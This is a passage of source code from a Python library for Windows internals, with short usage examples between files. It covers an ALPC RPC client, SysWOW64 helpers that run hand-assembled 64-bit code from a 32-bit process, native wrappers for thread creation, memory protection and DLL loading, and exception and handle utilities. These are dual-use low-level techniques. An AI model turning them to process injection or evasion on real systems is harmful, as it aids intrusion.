iid_hash = hash(buffer(IID)[:]) # TODO: add __hash__ to IID
self.if_bind_number[iid_hash] = self.number_of_bind_if
self.number_of_bind_if += 1
#TODO: attach version information to IID
return IID
def call(self, IID, method_offset, params):
"""Call method number ``method_offset`` of interface ``IID`` with mashalled ``params``
:param IID IID: An IID previously returned by :func:`bind`
:param int method_offset:
:param str params: The mashalled parameters (NDR32)
:returns: :class:`str`
"""
iid_hash = hash(buffer(IID)[:])
interface_nb = self.if_bind_number[iid_hash] # TODO: add __hash__ to IID
request = self._forge_call_request(interface_nb, method_offset, params)
response = self._send_request(request)
# Parse response
request_type = self._get_request_type(response)
if request_type != gdef.RPC_RESPONSE_TYPE_SUCCESS:
raise ValueError("Unexpected reponse type. Expected RESPONSE_SUCCESS got {0}".format(KNOW_RESPONSE_TYPE[request_type]))
data = struct.unpack("<6I", response[:6 * 4])
assert data[3] == self.REQUEST_IDENTIFIER
return response[4 * 6:] # Should be the return value (not completly verified)
def _send_request(self, request):
response = self.alpc_client.send_receive(request)
return response.data
def _forge_call_request(self, interface_nb, method_offset, params):
# TODO: differents REQUEST_IDENTIFIER for each req ?
# TODO: what is this '0' ? (1 is also accepted) (flags ?)
# request = struct.pack("<16I", gdef.RPC_REQUEST_TYPE_CALL, NOT_USED, 1, self.REQUEST_IDENTIFIER, interface_nb, method_offset, *[NOT_USED] * 10)
req = ALPC_RPC_CALL()
req.request_type = gdef.RPC_REQUEST_TYPE_CALL
req.flags = 0
req.request_id = self.REQUEST_IDENTIFIER
req.if_nb = interface_nb
req.method_offset = method_offset
return buffer(req)[:] + params
def _forge_bind_request(self, uuid, syntaxversion, requested_if_nb):
version_major, version_minor = syntaxversion
req = ALPC_RPC_BIND()
req.request_type = gdef.RPC_REQUEST_TYPE_BIND
req.target = gdef.RPC_IF_ID(uuid, *syntaxversion)
req.flags = gdef.BIND_IF_SYNTAX_NDR32
# req.flags = gdef.BIND_IF_SYNTAX_NDR64
req.if_nb_ndr32 = requested_if_nb
req.if_nb_ndr64 = 0
req.if_nb_ndr64 = requested_if_nb
req.if_nb_unkn = 0
req.register_multiple_syntax = False
req.some_context_id = 0xB00B00B
return buffer(req)[:]
def _get_request_type(self, response):
"raise if request_type == RESPONSE_TYPE_FAIL"
request_type = struct.unpack("<I", response[:4])[0]
if request_type == gdef.RPC_RESPONSE_TYPE_FAIL:
error_code = struct.unpack("<5I", response)[2]
raise ValueError("RPC Response error {0} ({1})".format(error_code, KNOWN_RPC_ERROR_CODE.get(error_code, error_code)))
return request_type
```
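A hedged sketch of driving ``RPCClient`` above against a local ALPC endpoint; the port name, interface UUID and the hand-packed NDR32 blob are placeholders, not a real reachable interface, and the exported name ``windows.rpc.RPCClient`` is an assumption about the package ``__init__``.

```python
# Hedged sketch: nothing below points at a real endpoint, it only shows the
# bind/call flow of RPCClient.
import struct
import windows.rpc

client = windows.rpc.RPCClient(r"\RPC Control\SomeAlpcEndpoint")   # placeholder port
iid = client.bind("11111111-2222-3333-4444-555555555555", version=(1, 0))
params = struct.pack("<I", 42)           # NDR32 encoding of a single DWORD argument
raw_reply = client.call(iid, 0, params)  # method 0 of the bound interface
```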
#### File: PythonForWindows/windows/syswow64.py
```python
import struct
import ctypes
from ctypes import byref
import codecs
import functools
import windows
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
from generated_def.winstructs import *
from windows.winobject import process
from windows import winproxy
from winproxy import NeededParameter
# Special code for syswow64 process
CS_32bits = 0x23
CS_64bits = 0x33
def generate_64bits_execution_stub_from_syswow(x64shellcode):
"""shellcode must NOT end by a ret"""
current_process = windows.current_process
if not current_process.is_wow_64:
raise ValueError("Calling generate_64bits_execution_stub_from_syswow from non-syswow process")
transition64 = x64.MultipleInstr()
transition64 += x64.Call(":TOEXEC")
transition64 += x64.Mov("RDX", "RAX")
transition64 += x64.Shr("RDX", 32)
transition64 += x64.Retf32() # 32 bits return addr
transition64 += x64.Label(":TOEXEC")
x64shellcodeaddr = windows.current_process.allocator.write_code(transition64.get_code() + x64shellcode)
transition = x86.MultipleInstr()
transition += x86.Call(CS_64bits, x64shellcodeaddr)
transition += x86.Ret()
stubaddr = windows.current_process.allocator.write_code(transition.get_code())
exec_stub = ctypes.CFUNCTYPE(ULONG64)(stubaddr)
return exec_stub
def execute_64bits_code_from_syswow(x64shellcode):
return generate_64bits_execution_stub_from_syswow(x64shellcode)()
def generate_syswow64_call(target, errcheck=None):
nb_args = len(target.prototype._argtypes_)
target_addr = get_syswow_ntdll_exports()[target.__name__]
argument_buffer_len = (nb_args * 8)
argument_buffer = windows.current_process.allocator.reserve_size(argument_buffer_len)
alignement_information = windows.current_process.allocator.reserve_size(8)
nb_args_on_stack = max(nb_args - 4, 0)
code_64b = x64.MultipleInstr()
# Save registers
code_64b += x64.Push('RBX')
code_64b += x64.Push('RCX')
code_64b += x64.Push('RDX')
code_64b += x64.Push('RSI')
code_64b += x64.Push('RDI')
code_64b += x64.Push('R8')
code_64b += x64.Push('R9')
code_64b += x64.Push('R10')
code_64b += x64.Push('R11')
code_64b += x64.Push('R12')
code_64b += x64.Push('R13')
# Alignment stuff :)
code_64b += x64.Mov('RCX', 'RSP')
code_64b += x64.And('RCX', 0x0f)
code_64b += x64.Mov(x64.deref(alignement_information), 'RCX')
code_64b += x64.Sub('RSP', 'RCX')
# retrieve argument from the argument buffer
if nb_args >= 1:
code_64b += x64.Mov('RCX', x64.create_displacement(disp=argument_buffer))
if nb_args >= 2:
code_64b += x64.Mov('RDX', x64.create_displacement(disp=argument_buffer + (8 * 1)))
if nb_args >= 3:
code_64b += x64.Mov('R8', x64.create_displacement(disp=argument_buffer + (8 * 2)))
if nb_args >= 4:
code_64b += x64.Mov('R9', x64.create_displacement(disp=argument_buffer + (8 * 3)))
for i in range(nb_args_on_stack):
code_64b += x64.Mov('RAX', x64.create_displacement(disp=argument_buffer + 8 * (nb_args - 1 - i)))
code_64b += x64.Push('RAX')
# reserve space for register (calling convention)
code_64b += x64.Push('R9')
code_64b += x64.Push('R8')
code_64b += x64.Push('RDX')
code_64b += x64.Push('RCX')
# Call
code_64b += x64.Mov('R13', target_addr)
code_64b += x64.Call('R13')
# Realign stack :)
code_64b += x64.Add('RSP', x64.deref(alignement_information))
# Clean stack
code_64b += x64.Add('RSP', (4 + nb_args_on_stack) * 8)
code_64b += x64.Pop('R13')
code_64b += x64.Pop('R12')
code_64b += x64.Pop('R11')
code_64b += x64.Pop('R10')
code_64b += x64.Pop('R9')
code_64b += x64.Pop('R8')
code_64b += x64.Pop('RDI')
code_64b += x64.Pop('RSI')
code_64b += x64.Pop('RDX')
code_64b += x64.Pop('RCX')
code_64b += x64.Pop('RBX')
code_64b += x64.Ret()
return try_generate_stub_target(code_64b.get_code(), argument_buffer, target, errcheck=errcheck)
def try_generate_stub_target(shellcode, argument_buffer, target, errcheck=None):
if not windows.current_process.is_wow_64:
raise ValueError("Calling execute_64bits_code_from_syswow from non-syswow process")
native_caller = generate_64bits_execution_stub_from_syswow(shellcode)
native_caller.errcheck = errcheck if errcheck is not None else target.errcheck
# Generate the wrapper function that fill the argument_buffer
expected_arguments_number = len(target.prototype._argtypes_)
def wrapper(*args):
if len(args) != expected_arguments_number:
raise ValueError("{0} syswow accept {1} args ({2} given)".format(target.__name__, expected_arguments_number, len(args)))
# Transform args (ctypes byref possibly) to int
writable_args = []
for i, value in enumerate(args):
if not isinstance(value, (int, long)):
try:
value = ctypes.cast(value, ctypes.c_void_p).value
except ctypes.ArgumentError as e:
raise ctypes.ArgumentError("Argument {0}: wrong type <{1}>".format(i, type(value).__name__))
writable_args.append(value)
# Build buffer
buffer = struct.pack("<" + "Q" * len(writable_args), *writable_args)
ctypes.memmove(argument_buffer, buffer, len(buffer))
# Copy original args into the function, for errcheck if needed
native_caller.current_original_args = args # TODO: THIS IS NOT THREAD SAFE
return native_caller()
wrapper.__name__ = "{0}<syswow64>".format(target.__name__,)
wrapper.__doc__ = "This is a wrapper to {0} in 64b mode, it accept <{1}> args".format(target.__name__, expected_arguments_number)
return wrapper
def get_current_process_syswow_peb_addr():
get_peb_64_code = x64.assemble("mov rax, gs:[0x60]; ret")
return execute_64bits_code_from_syswow(get_peb_64_code)
def get_current_process_syswow_peb():
current_process = windows.current_process
class CurrentProcessReadSyswow(process.Process):
bitness = 64
def _get_handle(self):
return winproxy.OpenProcess(dwProcessId=current_process.pid)
def read_memory(self, addr, size):
buffer_addr = ctypes.create_string_buffer(size)
winproxy.NtWow64ReadVirtualMemory64(self.handle, addr, buffer_addr, size)
return buffer_addr[:]
peb_addr = get_current_process_syswow_peb_addr()
return windows.winobject.process.RemotePEB64(peb_addr, CurrentProcessReadSyswow())
class ReadSyswow64Process(process.Process):
def __init__(self, target):
self.target = target
self._bitness = target.bitness
def _get_handle(self):
return self.target.handle
def read_memory(self, addr, size):
buffer_addr = ctypes.create_string_buffer(size)
winproxy.NtWow64ReadVirtualMemory64(self.target.handle, addr, buffer_addr, size)
return buffer_addr[:]
#read_string = process.Process.read_string
def get_syswow_ntdll_exports():
if get_syswow_ntdll_exports.value is not None:
return get_syswow_ntdll_exports.value
peb64 = get_current_process_syswow_peb()
ntdll64 = [m for m in peb64.modules if m.name == "ntdll.dll"]
if not ntdll64:
raise ValueError("Could not find ntdll.dll in syswow peb")
ntdll64 = ntdll64[0]
exports = ntdll64.pe.exports
get_syswow_ntdll_exports.value = exports
return exports
get_syswow_ntdll_exports.value = None
class Syswow64ApiProxy(object):
"""Create a python wrapper around a function"""
def __init__(self, winproxy_function, errcheck=None):
self.winproxy_function = winproxy_function
self.raw_call = None
self.errcheck = errcheck
if winproxy_function is not None:
self.params_name = [param[1] for param in winproxy_function.params]
def __call__(self, python_proxy):
if not windows.winproxy.is_implemented(self.winproxy_function):
return None
def force_resolution():
if self.raw_call:
return True
try:
self.raw_call = generate_syswow64_call(self.winproxy_function, errcheck=self.errcheck)
except KeyError:
raise windows.winproxy.ExportNotFound(self.winproxy_function.__name__, "SysWow[ntdll64]")
def perform_call(*args):
if len(self.params_name) != len(args):
print("ERROR:")
print("Expected params: {0}".format(self.params_name))
print("Just Got params: {0}".format(args))
raise ValueError("I do not have all parameters: how is that possible ?")
for param_name, param_value in zip(self.params_name, args):
if param_value is NeededParameter:
raise TypeError("{0}: Missing Mandatory parameter <{1}>".format(self.winproxy_function.__name__, param_name))
if self.raw_call is None:
force_resolution()
return self.raw_call(*args)
setattr(python_proxy, "ctypes_function", perform_call)
setattr(python_proxy, "force_resolution", force_resolution)
return python_proxy
def ntquerysysteminformation_syswow64_error_check(result, func, args):
args = func.current_original_args
if result == 0:
return args
# Ignore STATUS_INFO_LENGTH_MISMATCH if SystemInformation is None
if result == STATUS_INFO_LENGTH_MISMATCH and not args[1]:
return args
raise WinproxyError("{0} failed with NTStatus {1}".format(func_name, hex(result)))
@Syswow64ApiProxy(winproxy.NtQuerySystemInformation, errcheck=ntquerysysteminformation_syswow64_error_check)
# @Syswow64ApiProxy(winproxy.NtQuerySystemInformation)
def NtQuerySystemInformation_32_to_64(SystemInformationClass, SystemInformation=None, SystemInformationLength=0, ReturnLength=NeededParameter):
if SystemInformation is not None and SystemInformationLength == 0:
SystemInformationLength = ctypes.sizeof(SystemInformation)
if SystemInformation is None:
SystemInformation = 0
return NtQuerySystemInformation_32_to_64.ctypes_function(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtCreateThreadEx)
def NtCreateThreadEx_32_to_64(ThreadHandle=None, DesiredAccess=0x1fffff, ObjectAttributes=0, ProcessHandle=NeededParameter, lpStartAddress=NeededParameter, lpParameter=NeededParameter, CreateSuspended=0, dwStackSize=0, Unknown1=0, Unknown2=0, Unknown3=0):
if ThreadHandle is None:
ThreadHandle = byref(HANDLE())
return NtCreateThreadEx_32_to_64.ctypes_function(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, dwStackSize, Unknown1, Unknown2, Unknown3)
ProcessBasicInformation = 0
@Syswow64ApiProxy(winproxy.NtQueryInformationProcess)
def NtQueryInformationProcess_32_to_64(ProcessHandle, ProcessInformationClass=ProcessBasicInformation, ProcessInformation=NeededParameter, ProcessInformationLength=0, ReturnLength=None):
if ProcessInformation is not None and ProcessInformationLength == 0:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
if type(ProcessInformation) == PROCESS_BASIC_INFORMATION:
ProcessInformation = byref(ProcessInformation)
if ReturnLength is None:
ReturnLength = byref(ULONG())
return NtQueryInformationProcess_32_to_64.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtQueryInformationThread)
def NtQueryInformationThread_32_to_64(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = byref(ULONG())
if ThreadInformation is not None and ThreadInformationLength == 0:
ThreadInformationLength = ctypes.sizeof(ThreadInformation)
return NtQueryInformationThread_32_to_64.ctypes_function(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtQueryVirtualMemory)
def NtQueryVirtualMemory_32_to_64(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation=NeededParameter, MemoryInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = byref(ULONG())
if MemoryInformation is not None and MemoryInformationLength == 0:
MemoryInformationLength = ctypes.sizeof(MemoryInformation)
if isinstance(MemoryInformation, ctypes.Structure):
MemoryInformation = byref(MemoryInformation)
return NtQueryVirtualMemory_32_to_64.ctypes_function(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation, MemoryInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtProtectVirtualMemory)
def NtProtectVirtualMemory_32_to_64(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection=None):
if OldAccessProtection is None:
XOldAccessProtection = DWORD()
OldAccessProtection = ctypes.addressof(XOldAccessProtection)
return NtProtectVirtualMemory_32_to_64.ctypes_function(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection)
@Syswow64ApiProxy(winproxy.NtGetContextThread)
def NtGetContextThread_32_to_64(hThread, lpContext):
if type(lpContext) == windows.winobject.exception.ECONTEXT64:
lpContext = byref(lpContext)
return NtGetContextThread_32_to_64.ctypes_function(hThread, lpContext)
@Syswow64ApiProxy(winproxy.LdrLoadDll)
def LdrLoadDll_32_to_64(PathToFile, Flags, ModuleFileName, ModuleHandle):
return LdrLoadDll_32_to_64.ctypes_function(PathToFile, Flags, ModuleFileName, ModuleHandle)
@Syswow64ApiProxy(winproxy.NtSetContextThread)
def NtSetContextThread_32_to_64(hThread, lpContext):
return NtSetContextThread_32_to_64.ctypes_function(hThread, lpContext)
```
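A hedged sketch of the SysWOW64 helpers above; it is only meaningful from a 32-bit Python running on 64-bit Windows, otherwise the helpers raise ``ValueError``.

```python
# Hedged sketch: must run from a 32-bit (WOW64) python on a 64-bit Windows.
import windows
import windows.syswow64
import windows.native_exec.simple_x64 as x64

# Execute a tiny 64-bit stub from the 32-bit process: read the 64-bit PEB address.
peb64_addr = windows.syswow64.execute_64bits_code_from_syswow(
    x64.assemble("mov rax, gs:[0x60]; ret"))
print(hex(peb64_addr))

# The same information through the higher-level wrapper.
peb64 = windows.syswow64.get_current_process_syswow_peb()
print([m.name for m in peb64.modules][:3])
```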
#### File: windows/winobject/exception.py
```python
import sys
import ctypes
import windows
from windows.generated_def.winstructs import *
import windows.generated_def.windef as windef
EXCEPTION_CONTINUE_SEARCH = (0x0)
EXCEPTION_CONTINUE_EXECUTION = (0xffffffff)
exception_type = [
"EXCEPTION_ACCESS_VIOLATION",
"EXCEPTION_DATATYPE_MISALIGNMENT",
"EXCEPTION_BREAKPOINT",
"EXCEPTION_SINGLE_STEP",
"EXCEPTION_ARRAY_BOUNDS_EXCEEDED",
"EXCEPTION_FLT_DENORMAL_OPERAND",
"EXCEPTION_FLT_DIVIDE_BY_ZERO",
"EXCEPTION_FLT_INEXACT_RESULT",
"EXCEPTION_FLT_INVALID_OPERATION",
"EXCEPTION_FLT_OVERFLOW",
"EXCEPTION_FLT_STACK_CHECK",
"EXCEPTION_FLT_UNDERFLOW",
"EXCEPTION_INT_DIVIDE_BY_ZERO",
"EXCEPTION_INT_OVERFLOW",
"EXCEPTION_PRIV_INSTRUCTION",
"EXCEPTION_IN_PAGE_ERROR",
"EXCEPTION_ILLEGAL_INSTRUCTION",
"EXCEPTION_NONCONTINUABLE_EXCEPTION",
"EXCEPTION_STACK_OVERFLOW",
"EXCEPTION_INVALID_DISPOSITION",
"EXCEPTION_GUARD_PAGE",
"EXCEPTION_INVALID_HANDLE",
"EXCEPTION_POSSIBLE_DEADLOCK",
]
# x -> x dict may seems strange but useful to get the Flags (with name) from the int
# exception_name_by_value[0x80000001] -> EXCEPTION_GUARD_PAGE(0x80000001L)
exception_name_by_value = dict([(x, x) for x in [getattr(windows.generated_def.windef, name) for name in exception_type]])
class EEXCEPTION_RECORDBase(object):
@property
def ExceptionCode(self):
"""The Exception code
:type: :class:`int`"""
real_code = super(EEXCEPTION_RECORDBase, self).ExceptionCode
return exception_name_by_value.get(real_code, windows.generated_def.windef.Flag("UNKNOW_EXCEPTION", real_code))
@property
def ExceptionAddress(self):
"""The Exception Address
:type: :class:`int`"""
x = super(EEXCEPTION_RECORDBase, self).ExceptionAddress
if x is None:
return 0x0
return x
class EEXCEPTION_RECORD(EEXCEPTION_RECORDBase, EXCEPTION_RECORD):
"""Enhanced exception record"""
fields = [f[0] for f in EXCEPTION_RECORD._fields_]
"""The fields of the structure"""
class EEXCEPTION_RECORD32(EEXCEPTION_RECORDBase, EXCEPTION_RECORD32):
"""Enhanced exception record (32bits)"""
fields = [f[0] for f in EXCEPTION_RECORD32._fields_]
"""The fields of the structure"""
class EEXCEPTION_RECORD64(EEXCEPTION_RECORDBase, EXCEPTION_RECORD64):
"""Enhanced exception record (64bits)"""
fields = [f[0] for f in EXCEPTION_RECORD64._fields_]
"""The fields of the structure"""
class EEXCEPTION_DEBUG_INFO32(ctypes.Structure):
"""Enhanced Debug info"""
_fields_ = windows.utils.transform_ctypes_fields(EXCEPTION_DEBUG_INFO, {"ExceptionRecord": EEXCEPTION_RECORD32})
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class EEXCEPTION_DEBUG_INFO64(ctypes.Structure):
"""Enhanced Debug info"""
_fields_ = windows.utils.transform_ctypes_fields(EXCEPTION_DEBUG_INFO, {"ExceptionRecord": EEXCEPTION_RECORD64})
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class EEflags(ctypes.Structure):
"Flag view of the Eflags register"
_fields_ = [("CF", DWORD, 1),
("RES_1", DWORD, 1),
("PF", DWORD, 1),
("RES_3", DWORD, 1),
("AF", DWORD, 1),
("RES_5", DWORD, 1),
("ZF", DWORD, 1),
("SF", DWORD, 1),
("TF", DWORD, 1),
("IF", DWORD, 1),
("DF", DWORD, 1),
("OF", DWORD, 1),
("IOPL_1", DWORD, 1),
("IOPL_2", DWORD, 1),
("NT", DWORD, 1),
("RES_15", DWORD, 1),
("RF", DWORD, 1),
("VM", DWORD, 1),
("AC", DWORD, 1),
("VIF", DWORD, 1),
("VIP", DWORD, 1),
("ID", DWORD, 1),
]
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
def get_raw(self):
x = DWORD.from_address(ctypes.addressof(self))
return x.value
def set_raw(self, value):
x = DWORD.from_address(ctypes.addressof(self))
x.value = value
return None
def dump(self):
res = []
for name in [x[0] for x in self._fields_]:
if name.startswith("RES_"):
continue
if getattr(self, name):
res.append(name)
return "|".join(res)
def __repr__(self):
return hex(self)
def __hex__(self):
if self.raw == 0:
return "{0}({1})".format(type(self).__name__, hex(self.raw))
return "{0}({1}:{2})".format(type(self).__name__, hex(self.raw), self.dump())
raw = property(get_raw, set_raw)
"""Raw value of the eflags
:type: :class:`int`
"""
class EDr7(ctypes.Structure):
"Flag view of the DR7 register"
_fields_ = [("L0", DWORD, 1),
("G0", DWORD, 1),
("L1", DWORD, 1),
("G1", DWORD, 1),
("L2", DWORD, 1),
("G2", DWORD, 1),
("L3", DWORD, 1),
("G3", DWORD, 1),
("LE", DWORD, 1),
("GE", DWORD, 1),
("RES_1", DWORD, 3),
("GD", DWORD, 1),
("RES_1", DWORD, 2),
("RW0", DWORD, 2),
("LEN0", DWORD, 2),
("RW1", DWORD, 2),
("LEN1", DWORD, 2),
("RW2", DWORD, 2),
("LEN2", DWORD, 2),
("RW3", DWORD, 2),
("LEN3", DWORD, 2),
]
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class ECONTEXTBase(object):
"""DAT CONTEXT"""
default_dump = ()
pc_reg = ''
sp_reg = ''
func_result_reg = ''
special_reg_type = {}
def regs(self, to_dump=None):
"""Return the name and values of the registers
:returns: [(reg_name, value)] -- A :class:`list` of :class:`tuple`"""
res = []
if to_dump is None:
to_dump = self.default_dump
for name in to_dump:
value = getattr(self, name)
if name in self.special_reg_type:
value = self.special_reg_type[name](value)
res.append((name, value))
return res
def dump(self, to_dump=None):
"""Dump (print) the current context"""
regs = self.regs()
for name, value in regs:
print("{0} -> {1}".format(name, hex(value)))
return None
def get_pc(self):
return getattr(self, self.pc_reg)
def set_pc(self, value):
return setattr(self, self.pc_reg, value)
def get_sp(self):
return getattr(self, self.sp_reg)
def set_sp(self, value):
return setattr(self, self.sp_reg, value)
def get_func_result(self):
return getattr(self, self.func_result_reg)
def set_func_result(self, value):
return setattr(self, self.func_result_reg, value)
pc = property(get_pc, set_pc, None, "Program Counter register (EIP or RIP)")
sp = property(get_sp, set_sp, None, "Stack Pointer register (ESP or RSP)")
func_result = property(get_func_result, set_func_result, None, "Function result register (EAX or RAX)")
@property
def EEFlags(self):
"""Enhanced view of the Eflags (you also have ``EFlags`` for the raw value)
:type: :class:`EEflags`
"""
off = type(self).EFlags.offset
x = EEflags.from_address(ctypes.addressof(self) + off)
x.self = self
return x
@property
def EDr7(self):
"""Enhanced view of the DR7 register (you also have ``Dr7`` for the raw value)
:type: :class:`EDr7`
"""
off = type(self).Dr7.offset
x = EDr7.from_address(ctypes.addressof(self) + off)
x.self = self
return x
class ECONTEXT32(ECONTEXTBase, CONTEXT32):
default_dump = ('Eip', 'Esp', 'Eax', 'Ebx', 'Ecx', 'Edx', 'Ebp', 'Edi', 'Esi', 'EFlags')
pc_reg = 'Eip'
sp_reg = 'Esp'
func_result_reg = 'Eax'
fields = [f[0] for f in CONTEXT32._fields_]
"""The fields of the structure"""
class ECONTEXTWOW64(ECONTEXTBase, WOW64_CONTEXT):
default_dump = ('Eip', 'Esp', 'Eax', 'Ebx', 'Ecx', 'Edx', 'Ebp', 'Edi', 'Esi', 'EFlags')
pc_reg = 'Eip'
sp_reg = 'Esp'
func_result_reg = 'Eax'
fields = [f[0] for f in WOW64_CONTEXT._fields_]
"""The fields of the structure"""
class ECONTEXT64(ECONTEXTBase, CONTEXT64):
default_dump = ('Rip', 'Rsp', 'Rax', 'Rbx', 'Rcx', 'Rdx', 'Rbp', 'Rdi', 'Rsi',
'R8', 'R9', 'R10', 'R11', 'R12', 'R13', 'R14', 'R15', 'EFlags')
pc_reg = 'Rip'
sp_reg = 'Rsp'
func_result_reg = 'Rax'
fields = [f[0] for f in CONTEXT64._fields_]
"""The fields of the structure"""
@classmethod
def new_aligned(cls):
"""Return a new :class:`ECONTEXT64` aligned on 16 bits
temporary workaround or horrible hack ? choose your side
"""
size = ctypes.sizeof(cls)
nb_qword = (size + 8) / ctypes.sizeof(ULONGLONG)
buffer = (nb_qword * ULONGLONG)()
struct_address = ctypes.addressof(buffer)
if (struct_address & 0xf) not in [0, 8]:
raise ValueError("ULONGLONG array not aligned on 8")
if (struct_address & 0xf) == 8:
struct_address += 8
self = cls.from_address(struct_address)
# Keep the raw buffer alive
self._buffer = buffer
return self
def bitness():
"""Return 32 or 64"""
import platform
bits = platform.architecture()[0]
return int(bits[:2])
if bitness() == 32:
ECONTEXT = ECONTEXT32
else:
ECONTEXT = ECONTEXT64
class EEXCEPTION_POINTERS(ctypes.Structure):
_fields_ = [
("ExceptionRecord", ctypes.POINTER(EEXCEPTION_RECORD)),
("ContextRecord", ctypes.POINTER(ECONTEXT)),
]
def dump(self):
"""Dump (print) the EEXCEPTION_POINTERS"""
record = self.ExceptionRecord[0]
print("Dumping Exception: ")
print(" ExceptionCode = {0} at {1}".format(record.ExceptionCode, hex(record.ExceptionAddress)))
regs = self.ContextRecord[0].regs()
for name, value in regs:
print(" {0} -> {1}".format(name, hex(value)))
class VectoredException(object):
"""A decorator that create a callable which can be passed to :func:`AddVectoredExceptionHandler`"""
func_type = ctypes.WINFUNCTYPE(ctypes.c_uint, ctypes.POINTER(EEXCEPTION_POINTERS))
def __new__(cls, func):
self = object.__new__(cls)
self.func = func
v = self.func_type(self.decorator)
v.self = self
return v
def decorator(self, exception_pointers):
try:
return self.func(exception_pointers)
except BaseException as e:
import traceback
print("Ignored Python Exception in Vectored Exception: {0}".format(e))
traceback.print_exc()
return windef.EXCEPTION_CONTINUE_SEARCH
class VectoredExceptionHandler(object):
def __init__(self, pos, handler):
self.handler = VectoredException(handler)
self.pos = pos
def __enter__(self):
self.value = windows.winproxy.AddVectoredExceptionHandler(self.pos, self.handler)
return self
def __exit__(self, exc_type, exc_value, traceback):
windows.winproxy.RemoveVectoredExceptionHandler(self.value)
return False
class DumpContextOnException(VectoredExceptionHandler):
def __init__(self, exit=False):
self.exit = exit
super(DumpContextOnException, self).__init__(self.print_context_result)
def print_context_result(self, exception_pointers):
except_record = exception_pointers[0].ExceptionRecord[0]
exception_pointers[0].dump()
sys.stdout.flush()
if self.exit:
windows.current_process.exit()
return 0
```
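A hedged sketch of the vectored-exception helpers above; the handler only logs and lets Windows keep searching, so nothing here actually handles a fault.

```python
# Hedged sketch: register a vectored handler for the current process and
# remove it on exit; the handler body is illustrative.
import windows
import windows.generated_def.windef as windef
from windows.winobject.exception import VectoredExceptionHandler

def log_exception(exception_pointers):
    record = exception_pointers[0].ExceptionRecord[0]
    print("Caught {0} at {1:#x}".format(record.ExceptionCode, record.ExceptionAddress))
    return windef.EXCEPTION_CONTINUE_SEARCH

with VectoredExceptionHandler(1, log_exception):
    pass  # code expected to fault would go here
```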
#### File: windows/winobject/handle.py
```python
import os
import ctypes
import windows
from windows import winproxy
from windows.generated_def import windef
from windows.generated_def.winstructs import *
# Remove this ?
class EPUBLIC_OBJECT_TYPE_INFORMATION(PUBLIC_OBJECT_TYPE_INFORMATION):
pass
current_process_pid = os.getpid()
class Handle(SYSTEM_HANDLE):
"""A handle of the system"""
@windows.utils.fixedpropety
def process(self):
"""The process possessing the handle
:type: :class:`WinProcess <windows.winobject.process.WinProcess>`"""
# "TODO: something smart ? :D"
# return [p for p in windows.system.processes if p.pid == self.dwProcessId][0]
return windows.WinProcess(pid=self.dwProcessId)
@windows.utils.fixedpropety
def name(self):
"""The name of the handle
:type: :class:`str`"""
return self._get_object_name()
@windows.utils.fixedpropety
def type(self):
"""The type of the handle
:type: :class:`str`"""
return self._get_object_type()
@property
def infos(self):
"""TODO: DOC"""
return self._get_object_basic_infos()
def _get_object_name(self):
lh = self.local_handle
size_needed = DWORD()
yyy = ctypes.c_buffer(0x1000)
winproxy.NtQueryObject(lh, ObjectNameInformation, ctypes.byref(yyy), ctypes.sizeof(yyy), ctypes.byref(size_needed))
return LSA_UNICODE_STRING.from_buffer_copy(yyy[:size_needed.value]).str
def _get_object_type(self):
lh = self.local_handle
xxx = EPUBLIC_OBJECT_TYPE_INFORMATION()
size_needed = DWORD()
try:
winproxy.NtQueryObject(lh, ObjectTypeInformation, ctypes.byref(xxx), ctypes.sizeof(xxx), ctypes.byref(size_needed))
except WindowsError as e:
if e.code != STATUS_INFO_LENGTH_MISMATCH:
# print("ERROR WITH {0:x}".format(lh))
raise
size = size_needed.value
buffer = ctypes.c_buffer(size)
winproxy.NtQueryObject(lh, ObjectTypeInformation, buffer, size, ctypes.byref(size_needed))
xxx = EPUBLIC_OBJECT_TYPE_INFORMATION.from_buffer_copy(buffer)
return xxx.TypeName.str
def _get_object_basic_infos(self):
lh = self.local_handle
size_needed = DWORD()
basic_infos = PUBLIC_OBJECT_BASIC_INFORMATION()
winproxy.NtQueryObject(lh, ObjectBasicInformation, ctypes.byref(basic_infos), ctypes.sizeof(basic_infos), ctypes.byref(size_needed))
return basic_infos
#PUBLIC_OBJECT_BASIC_INFORMATION
@windows.utils.fixedpropety
def local_handle(self):
"""A local copy of the handle, acquired with ``DuplicateHandle``
:type: :class:`int`"""
if self.dwProcessId == windows.current_process.pid:
return self.wValue
res = HANDLE()
winproxy.DuplicateHandle(self.process.handle, self.wValue, windows.current_process.handle, ctypes.byref(res), dwOptions=DUPLICATE_SAME_ACCESS)
return res.value
def description(self):
stype = self.type
descr_func = getattr(self, "description_" + stype, None)
if descr_func is None:
return None
return descr_func()
def description_Process(self):
proc = windows.WinProcess(handle=self.wValue)
res = str(proc)
del proc._handle
return res
def description_Thread(self):
thread = windows.WinThread(handle=self.wValue)
res = str(thread)
del thread._handle
return res
def __repr__(self):
return "<{0} value=<0x{1:x}> in process pid={2}>".format(type(self).__name__, self.wValue, self.dwProcessId)
def __del__(self):
if self.dwProcessId == current_process_pid:
return
if hasattr(self, "_local_handle"):
return winproxy.CloseHandle(self._local_handle)
def enumerate_handles():
size_needed = ULONG()
size = 0x1000
buffer = ctypes.c_buffer(size)
try:
